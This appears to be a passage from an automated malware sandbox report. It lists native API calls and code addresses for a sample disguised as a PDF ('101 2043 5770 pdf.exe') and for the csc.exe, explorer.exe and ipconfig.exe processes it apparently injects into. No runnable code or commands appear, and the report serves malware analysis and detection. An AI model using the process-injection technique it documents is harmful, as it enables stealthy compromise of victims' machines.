Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2C60 NtCreateKey,	6_2_059A2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2FA0 NtQuerySection,	6_2_059A2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2F60 NtCreateProcessEx,	6_2_059A2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2EE0 NtQueueApcThread,	6_2_059A2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2E30 NtWriteVirtualMemory,	6_2_059A2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A39B0 NtGetContextThread,	6_2_059A39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2B80 NtQueryInformationFile,	6_2_059A2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2BA0 NtEnumerateValueKey,	6_2_059A2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2BE0 NtQueryValueKey,	6_2_059A2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2AB0 NtWaitForSingleObject,	6_2_059A2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2AF0 NtWriteFile,	6_2_059A2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,NtClose,	6_2_0588A036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588A042 NtQueryInformationProcess,	6_2_0588A042
Source: C:\Windows\explorer.exe	Code function: 7_2_1124C232 NtCreateFile,NtReadFile,	7_2_1124C232
Source: C:\Windows\explorer.exe	Code function: 7_2_1124DE12 NtProtectVirtualMemory,	7_2_1124DE12
Source: C:\Windows\explorer.exe	Code function: 7_2_1124DE0A NtProtectVirtualMemory,	7_2_1124DE0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036035C0 NtCreateMutant,LdrInitializeThunk,	9_2_036035C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602B60 NtClose,LdrInitializeThunk,	9_2_03602B60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602AF0 NtWriteFile,LdrInitializeThunk,	9_2_03602AF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602AD0 NtReadFile,LdrInitializeThunk,	9_2_03602AD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602F30 NtCreateSection,LdrInitializeThunk,	9_2_03602F30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602FE0 NtCreateFile,LdrInitializeThunk,	9_2_03602FE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_03602EA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602D00 NtSetInformationFile,LdrInitializeThunk,	9_2_03602D00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602D10 NtMapViewOfSection,LdrInitializeThunk,	9_2_03602D10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_03602DF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602DD0 NtDelayExecution,LdrInitializeThunk,	9_2_03602DD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602C60 NtCreateKey,LdrInitializeThunk,	9_2_03602C60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_03602C70
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602CA0 NtQueryInformationToken,LdrInitializeThunk,	9_2_03602CA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03604340 NtSetContextThread,	9_2_03604340
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03603010 NtOpenDirectoryObject,	9_2_03603010
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03603090 NtSetValueKey,	9_2_03603090
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03604650 NtSuspendThread,	9_2_03604650
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602BE0 NtQueryValueKey,	9_2_03602BE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602BF0 NtAllocateVirtualMemory,	9_2_03602BF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602BA0 NtEnumerateValueKey,	9_2_03602BA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602B80 NtQueryInformationFile,	9_2_03602B80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602AB0 NtWaitForSingleObject,	9_2_03602AB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036039B0 NtGetContextThread,	9_2_036039B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602F60 NtCreateProcessEx,	9_2_03602F60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602FA0 NtQuerySection,	9_2_03602FA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602FB0 NtResumeThread,	9_2_03602FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602F90 NtProtectVirtualMemory,	9_2_03602F90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602E30 NtWriteVirtualMemory,	9_2_03602E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602EE0 NtQueueApcThread,	9_2_03602EE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602E80 NtReadVirtualMemory,	9_2_03602E80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03603D70 NtOpenThread,	9_2_03603D70
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602D30 NtUnmapViewOfSection,	9_2_03602D30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03603D10 NtOpenProcessToken,	9_2_03603D10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602DB0 NtEnumerateKey,	9_2_03602DB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602C00 NtQueryInformationProcess,	9_2_03602C00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602CF0 NtOpenProcess,	9_2_03602CF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602CC0 NtQueryVirtualMemory,	9_2_03602CC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A3E0 NtReadFile,	9_2_00C5A3E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A330 NtCreateFile,	9_2_00C5A330
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A460 NtClose,	9_2_00C5A460
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A2EA NtCreateFile,	9_2_00C5A2EA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A32B NtCreateFile,	9_2_00C5A32B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03989BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	9_2_03989BAF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,	9_2_0398A036
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03989DDD NtWriteVirtualMemory,NtResumeThread,	9_2_03989DDD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03989BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	9_2_03989BB2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398A042 NtQueryInformationProcess,	9_2_0398A042

Detected potential crypto function

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7881480	0_2_00007FF7D7881480
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7882BA0	0_2_00007FF7D7882BA0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7869B70	0_2_00007FF7D7869B70
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7868900	0_2_00007FF7D7868900
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7964740	0_2_00007FF7D7964740
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7884790	0_2_00007FF7D7884790
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7907680	0_2_00007FF7D7907680
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D78705E4	0_2_00007FF7D78705E4
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7880600	0_2_00007FF7D7880600
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7886450	0_2_00007FF7D7886450
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7862230	0_2_00007FF7D7862230
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7857250	0_2_00007FF7D7857250
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7867280	0_2_00007FF7D7867280
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D78B2140	0_2_00007FF7D78B2140
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D785B0B0	0_2_00007FF7D785B0B0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D793F0A0	0_2_00007FF7D793F0A0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D786F0D0	0_2_00007FF7D786F0D0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D787B080	0_2_00007FF7D787B080
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D788AFE0	0_2_00007FF7D788AFE0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7862F80	0_2_00007FF7D7862F80
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7883DF0	0_2_00007FF7D7883DF0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7860CA0	0_2_00007FF7D7860CA0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D787AC50	0_2_00007FF7D787AC50
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7858BC4	0_2_00007FF7D7858BC4
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7884BC0	0_2_00007FF7D7884BC0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D788DB50	0_2_00007FF7D788DB50
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7870B90	0_2_00007FF7D7870B90
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7885B10	0_2_00007FF7D7885B10
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7875A30	0_2_00007FF7D7875A30
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7858A20	0_2_00007FF7D7858A20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D791B9B0	0_2_00007FF7D791B9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0040102E	6_2_0040102E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041EC28	6_2_0041EC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041DD0E	6_2_0041DD0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041E5DE	6_2_0041E5DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00409E5D	6_2_00409E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00409E60	6_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D6C0	6_2_0041D6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0D5B0	6_2_05A0D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A30591	6_2_05A30591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A27571	6_2_05A27571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1E4F6	6_2_05A1E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2F43F	6_2_05A2F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A22446	6_2_05A22446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2F7B0	6_2_05A2F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596C7C0	6_2_0596C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05994750	6_2_05994750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598C6E0	6_2_0598C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A301AA	6_2_05A301AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597B1B0	6_2_0597B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A281CC	6_2_05A281CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05960100	6_2_05960100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F8158	6_2_059F8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B16B	6_2_05A3B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A516C	6_2_059A516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2F0E0	6_2_05A2F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A270E9	6_2_05A270E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F0CC	6_2_05A1F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059B739A	6_2_059B739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A303E6	6_2_05A303E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E3F0	6_2_0597E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2132D	6_2_05A2132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595D34C	6_2_0595D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2A352	6_2_05A2A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059752A0	6_2_059752A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A112ED	6_2_05A112ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598B2C0	6_2_0598B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F02C0	6_2_059F02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A10274	6_2_05A10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05988DBF	6_2_05988DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598FDC0	6_2_0598FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596ADE0	6_2_0596ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597AD00	6_2_0597AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A27D73	6_2_05A27D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05973D40	6_2_05973D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A21D5A	6_2_05A21D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A10CB5	6_2_05A10CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FCF2	6_2_05A2FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05960CF2	6_2_05960CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970C00	6_2_05970C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E9C32	6_2_059E9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971F92	6_2_05971F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FFB1	6_2_05A2FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EEFA0	6_2_059EEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05962FC8	6_2_05962FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597CFE0	6_2_0597CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05990F30	6_2_05990F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FF09	6_2_05A2FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059B2F28	6_2_059B2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E4F40	6_2_059E4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05982E90	6_2_05982E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05979EB0	6_2_05979EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2CE93	6_2_05A2CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2EEDB	6_2_05A2EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2EE26	6_2_05A2EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970E59	6_2_05970E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3A9A6	6_2_05A3A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059729A0	6_2_059729A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05979950	6_2_05979950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598B950	6_2_0598B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05986962	6_2_05986962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059568B8	6_2_059568B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E8F0	6_2_0599E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059738E0	6_2_059738E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD800	6_2_059DD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05972840	6_2_05972840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597A840	6_2_0597A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598FB80	6_2_0598FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059ADBF9	6_2_059ADBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E5BF0	6_2_059E5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A26BD7	6_2_05A26BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FB76	6_2_05A2FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2AB40	6_2_05A2AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0DAAC	6_2_05A0DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596EA80	6_2_0596EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059B5AA0	6_2_059B5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1DAC6	6_2_05A1DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A27A46	6_2_05A27A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FA49	6_2_05A2FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E3A6C	6_2_059E3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588A036	6_2_0588A036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588E5CD	6_2_0588E5CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05881082	6_2_05881082
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588B232	6_2_0588B232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05882D02	6_2_05882D02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05888912	6_2_05888912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05885B30	6_2_05885B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05885B32	6_2_05885B32
Source: C:\Windows\explorer.exe	Code function: 7_2_10171036	7_2_10171036
Source: C:\Windows\explorer.exe	Code function: 7_2_10168082	7_2_10168082
Source: C:\Windows\explorer.exe	Code function: 7_2_1016F912	7_2_1016F912
Source: C:\Windows\explorer.exe	Code function: 7_2_10169D02	7_2_10169D02
Source: C:\Windows\explorer.exe	Code function: 7_2_101755CD	7_2_101755CD
Source: C:\Windows\explorer.exe	Code function: 7_2_10172232	7_2_10172232
Source: C:\Windows\explorer.exe	Code function: 7_2_1016CB32	7_2_1016CB32
Source: C:\Windows\explorer.exe	Code function: 7_2_1016CB30	7_2_1016CB30
Source: C:\Windows\explorer.exe	Code function: 7_2_106EB036	7_2_106EB036
Source: C:\Windows\explorer.exe	Code function: 7_2_106E2082	7_2_106E2082
Source: C:\Windows\explorer.exe	Code function: 7_2_106E3D02	7_2_106E3D02
Source: C:\Windows\explorer.exe	Code function: 7_2_106E9912	7_2_106E9912
Source: C:\Windows\explorer.exe	Code function: 7_2_106EF5CD	7_2_106EF5CD
Source: C:\Windows\explorer.exe	Code function: 7_2_106EC232	7_2_106EC232
Source: C:\Windows\explorer.exe	Code function: 7_2_106E6B32	7_2_106E6B32
Source: C:\Windows\explorer.exe	Code function: 7_2_106E6B30	7_2_106E6B30
Source: C:\Windows\explorer.exe	Code function: 7_2_1124C232	7_2_1124C232
Source: C:\Windows\explorer.exe	Code function: 7_2_11246B30	7_2_11246B30
Source: C:\Windows\explorer.exe	Code function: 7_2_11246B32	7_2_11246B32
Source: C:\Windows\explorer.exe	Code function: 7_2_11243D02	7_2_11243D02
Source: C:\Windows\explorer.exe	Code function: 7_2_11249912	7_2_11249912
Source: C:\Windows\explorer.exe	Code function: 7_2_1124F5CD	7_2_1124F5CD
Source: C:\Windows\explorer.exe	Code function: 7_2_1124B036	7_2_1124B036
Source: C:\Windows\explorer.exe	Code function: 7_2_11242082	7_2_11242082
Source: C:\Windows\explorer.exe	Code function: 7_2_112E5D02	7_2_112E5D02
Source: C:\Windows\explorer.exe	Code function: 7_2_112EB912	7_2_112EB912
Source: C:\Windows\explorer.exe	Code function: 7_2_112F15CD	7_2_112F15CD
Source: C:\Windows\explorer.exe	Code function: 7_2_112ED036	7_2_112ED036
Source: C:\Windows\explorer.exe	Code function: 7_2_112E4082	7_2_112E4082
Source: C:\Windows\explorer.exe	Code function: 7_2_112E8B32	7_2_112E8B32
Source: C:\Windows\explorer.exe	Code function: 7_2_112E8B30	7_2_112E8B30
Source: C:\Windows\explorer.exe	Code function: 7_2_112EE232	7_2_112EE232
Source: C:\Windows\explorer.exe	Code function: 7_2_11445D02	7_2_11445D02
Source: C:\Windows\explorer.exe	Code function: 7_2_1144B912	7_2_1144B912
Source: C:\Windows\explorer.exe	Code function: 7_2_114515CD	7_2_114515CD
Source: C:\Windows\explorer.exe	Code function: 7_2_1144D036	7_2_1144D036
Source: C:\Windows\explorer.exe	Code function: 7_2_11444082	7_2_11444082
Source: C:\Windows\explorer.exe	Code function: 7_2_11448B30	7_2_11448B30
Source: C:\Windows\explorer.exe	Code function: 7_2_11448B32	7_2_11448B32
Source: C:\Windows\explorer.exe	Code function: 7_2_1144E232	7_2_1144E232
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00DE39FE	9_2_00DE39FE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035BD34C	9_2_035BD34C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368A352	9_2_0368A352
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368132D	9_2_0368132D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036903E6	9_2_036903E6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DE3F0	9_2_035DE3F0
